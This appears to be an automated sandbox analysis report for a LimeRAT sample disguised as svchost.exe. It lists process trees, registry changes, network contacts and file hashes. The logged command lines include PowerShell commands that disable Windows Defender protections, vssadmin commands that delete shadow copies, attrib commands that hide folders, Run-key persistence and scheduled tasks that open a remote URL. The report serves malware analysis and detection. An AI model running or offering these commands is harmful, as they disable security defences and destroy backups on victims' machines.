PID 2324 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3440 wrote to memory of 4132 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3440 wrote to memory of 4132 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1988 wrote to memory of 4972 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1988 wrote to memory of 4972 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4576 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4576 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:49" /sc daily /mo "5" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "01:25" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "07:56" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:09" /sc weekly /mo "4" /d "Mon" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "08:19" /sc monthly /m " jul" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:43294 ftp.encompossoftware.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.16:59320 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/2324-0-0x0000021B31B70000-0x0000021B31BB2000-memory.dmp

memory/2324-1-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

memory/2324-2-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-7-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-11-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-9-0x000001C2D4DB0000-0x000001C2D4DD2000-memory.dmp

memory/5016-14-0x000001C2D59C0000-0x000001C2D5A36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c04c0cci.e4n.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5016-43-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-51-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 326682587fa2a91cdce1a23343365924
SHA1 f3f9c4c753185c9ad8e65bbf3d3c027082b4ed5c
SHA256 c26a1262354d3eb74dc6da10db49ddcada09cf606f90f1ece7dba3332d090e20
SHA512 c6835c9e8de2676b92583cb7e96d3b64680f3e810d2b6dd7ce240b8c16c7c1060fd37a31df9f0afb8eed95dc7395a8c474f522407b77fd40aa15956b694c9f4c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c176893209cde8007a0f5725480f95a2
SHA1 8c2af7640abb79e5f29af46f7ff5b57cb99a9d24
SHA256 36d94401b3d02935ed756b287003dbeb246dd6de6bb5f7075dbb2719f78efe6a
SHA512 5dfcd2f66add6fd2da9af9d2d2b91c1288d5428afc26d59405f930cbacf90c2a30ae68b9fe30237cf1b337903b911916cab7c2815437931c0b39061bc1192049

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4be28fdfb37a676b93fad78b99d81211
SHA1 332072f199bce181ba74730b7d4d1072d2b0af19
SHA256 9e66684d79d4992d4fe387a5e3970545182a0ca52ecbf1b69cfbb537f5cedfa6
SHA512 69284ab872572813ff614b3c1fcf8738f14453b20066d91ed48b3051a406272031c2f5f6d70684480af746b07e7df1e113569ff21a17993bd9c577c2868198a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1251c52bf27855e59b1a121961ca2ab6
SHA1 9398fba66b322fd3ca99d6ad9476a06a46f92c41
SHA256 23f9fc9342bf8c5f567439b05b22533c15b8839e12612ecf782b42ad2b8f1c70
SHA512 cdd3a8fcd712893205efe86e7a30be64d37d7e04923a3a6042d87f4b0251a913bd77cdd7a729aaeece3050a7e7e88e275bb206f317cfabf02ad6409077016e63

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 42f854a16123a7207968a3690f6a3db7
SHA1 9bf2f4a63aeff9365f5a69cee28dfe769fd19bb4
SHA256 cdf414ceb304061e82bf6e0d70807a99307bc102851399e253850c0104b31e69
SHA512 558d194a5669a5df8f4ac6aadb36047c800ff773c4aa8bda107e268d4b58e261a703ad2a55e18acc8ba01de3391bd626b42fe794494aeb4ce03023f0a98d1bf4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 19c0976b6fb0de0eaa9c9e7b473064e1
SHA1 396be14e8cee53e7a631fc6dcda3aa2ec9b1b281
SHA256 b7ae4d869a394726856b59f24f2df0e643f9e0675ed89266ca9f881f1e21e17c
SHA512 889a95789d27cdb3bb706f54e7d19380e331fbaf2816f7d337a47b59017f63eabef515209993ffcfd199dd4d3c7221a24d67dd52da776a8bd542715c73c9e0c4

memory/2324-544-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2067ae57626e36223689ffecaba3b327
SHA1 0b2324ac98f9ede4932e3f8f560e03d4d1a1c8d7
SHA256 df7b47c1b102b6b5b0d020c46f45da8e9c595e9032d7d1cb4afd8bd7f61f4b19
SHA512 02f4894da5136eb13a18928d0502b9a98e3f2d7fc08434c302695d68da0a091c4b33d54ea4b091623ab5868bcfb9a5c5254ec3bade50bb445ac4e09fc7ad5a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e41c231d56e1281192f5209de73222c5
SHA1 59f24fafe8d7555a53a42cfab048477153148eb5
SHA256 27da3e64fae9b82755a2c2f147bc5c25803540c8d744acf6e4ea45f315305da8
SHA512 2d37ef379bc0651ab65ac10a65da7805f26657f66e700ea569c59d583c6c5a55f9cc09b4f763e8d3cc288cd4ec2ce42ea12ccc7cbeb01cf64ad5cb87eb846a9f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 80bd89f3610176124e7363c4f0729015
SHA1 9b045d173660cf2ffff206eed7e6acc69e4b8357
SHA256 73b6ab0315f2dae879f62688b02aa4f76794f57bfb431e4f833fff4cf89264e6
SHA512 0db85b745f6c23c9432053f8a0833994df0b44bda3a1721667caeb817bceccfaf4692eed9272ad69aaa2d4de12400aef3de98eb4bcf0d462e20f5868b22d39ac

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f775aa93e7cb45bcdb8003aac41437d3
SHA1 1bb3c21d107d0f5902315f83616e94931620309c
SHA256 3abbe7cf798db495b11bcbabd8242a234bbf278cb46d44344d03352c85f3e34b
SHA512 1f2b388e1fa2accb9cb033803b45ddee21ab1cdf5198d05721b9916bc885af1feed59b7f9062860644388df99cbcc82d092a1f6efeb7534b309fb7639238e226

memory/2324-559-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 05e991bcf019b487f7ad4e896c77e988
SHA1 f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 a9d9426944d7ee7cff4018213e207474
SHA1 e6a45f343e5181a5d44eccd5abd0a5e0d559ee29
SHA256 9d1fd0305bd35ac934cbcbfb7ded29505a255f77306994676d0b994e51dcdacb
SHA512 f3c4e6993baa914ef7fd0d93d8a4d82cf4b63df807634f810fd307d77341ffde80b0671c20fa0f84107aaf1ee00634488b877e200fcc1e66317bc05c9bc077a2

memory/2324-566-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/2968-574-0x00000211566B0000-0x00000211566CE000-memory.dmp

memory/2968-575-0x0000021172130000-0x0000021172656000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 22:02

Reported

2024-06-19 22:06

Platform

win10v2004-20240611-en

Max time kernel

190s

Max time network

169s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
